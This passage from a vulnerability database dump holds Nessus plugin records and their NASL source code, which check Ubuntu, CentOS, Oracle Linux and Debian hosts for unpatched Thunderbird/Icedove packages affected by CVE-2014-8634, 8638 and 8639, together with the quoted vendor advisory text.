"scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:thunderbird", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2460-1.NASL", "href": "https://www.tenable.com/plugins/nessus/80851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2460-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80851);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_bugtraq_id(72046, 72047, 72049);\n script_xref(name:\"USN\", value:\"2460-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : thunderbird vulnerabilities (USN-2460-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Christian Holler and Patrick McManus discovered multiple memory safety\nissues in Thunderbird. If a user were tricked in to opening a\nspecially crafted message with scripting enabled, an attacker could\npotentially exploit these to cause a denial of service via application\ncrash, or execute arbitrary code with the privileges of the user\ninvoking Thunderbird. (CVE-2014-8634)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a\nspecially crafted message with scripting enabled, an attacker could\npotentially exploit this to conduct cross-site request forgery (XSRF)\nattacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially\nexploit this to conduct session-fixation attacks. (CVE-2014-8639).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2460-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"thunderbird\", pkgver:\"1:31.4.0+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"thunderbird\", pkgver:\"1:31.4.0+build1-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"thunderbird\", pkgver:\"1:31.4.0+build1-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:29", "description": "An updated thunderbird package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted HTML mail message as JavaScript is disabled by default for mail messages. They could be exploited another way in Thunderbird, for example, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, and Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Thunderbird 31.4.0. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which contains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 : thunderbird (CESA-2015:0047)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:thunderbird", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2015-0047.NASL", "href": "https://www.tenable.com/plugins/nessus/80527", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0047 and \n# CentOS Errata and Security Advisory 2015:0047 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80527);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_xref(name:\"RHSA\", value:\"2015:0047\");\n\n script_name(english:\"CentOS 5 / 6 : thunderbird (CESA-2015:0047)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An updated thunderbird package that fixes three security issues is now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird\ndid not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker\nto conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, and Xiaofeng Zheng as the original reporters of\nthese issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Thunderbird 31.4.0. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020872.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f10831c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020878.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?82ba53bc\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8634\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"thunderbird-31.4.0-1.el5.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"thunderbird-31.4.0-1.el6.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:14", "description": "From Red Hat Security Advisory 2015:0047 :\n\nAn updated thunderbird package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted HTML mail message as JavaScript is disabled by default for mail messages. They could be exploited another way in Thunderbird, for example, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, and Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Thunderbird 31.4.0. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which contains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : thunderbird (ELSA-2015-0047)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:thunderbird", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2015-0047.NASL", "href": "https://www.tenable.com/plugins/nessus/80504", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0047 and \n# Oracle Linux Security Advisory ELSA-2015-0047 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80504);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_xref(name:\"RHSA\", value:\"2015:0047\");\n\n script_name(english:\"Oracle Linux 6 : thunderbird (ELSA-2015-0047)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2015:0047 :\n\nAn updated thunderbird package that fixes three security issues is now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird\ndid not follow the Cross-Origin Resource Sharing (CORS) specification.\nA web page containing malicious content could allow a remote attacker\nto conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, and Xiaofeng Zheng as the original reporters of\nthese issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Thunderbird 31.4.0. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004785.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"thunderbird-31.4.0-1.0.1.el6_6\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:29", "description": "Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail and news client: Multiple memory safety errors and implementation errors may lead to the execution of arbitrary code, information leaks or denial of service.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "nessus", "title": "Debian DSA-3132-1 : icedove - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:icedove", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3132.NASL", "href": "https://www.tenable.com/plugins/nessus/80834", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3132. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80834);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\");\n script_bugtraq_id(72046, 72047, 72049);\n script_xref(name:\"DSA\", value:\"3132\");\n\n script_name(english:\"Debian DSA-3132-1 : icedove - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Icedove, Debian's version\nof the Mozilla Thunderbird mail and news client: Multiple memory\nsafety errors and implementation errors may lead to the execution of\narbitrary code, information leaks or denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/icedove\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3132\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the icedove packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 31.4.0-1~deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:icedove\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"calendar-google-provider\", reference:\"31.4.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove\", reference:\"31.4.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dbg\", reference:\"31.4.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"icedove-dev\", reference:\"31.4.0-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceowl-extension\", reference:\"31.4.0-1~deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:54:08", "description": "The remote host is affected by the vulnerability described in GLSA-201504-01 (Mozilla Products: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Firefox, Thunderbird, and SeaMonkey. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, spoof the address bar, conduct clickjacking attacks, bypass security restrictions and protection mechanisms, or have other unspecified impact.\n Workaround :\n\n There are no known workarounds at this time.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-04-08T00:00:00", "type": "nessus", "title": "GLSA-201504-01 : Mozilla Products: Multiple vulnerabilities", 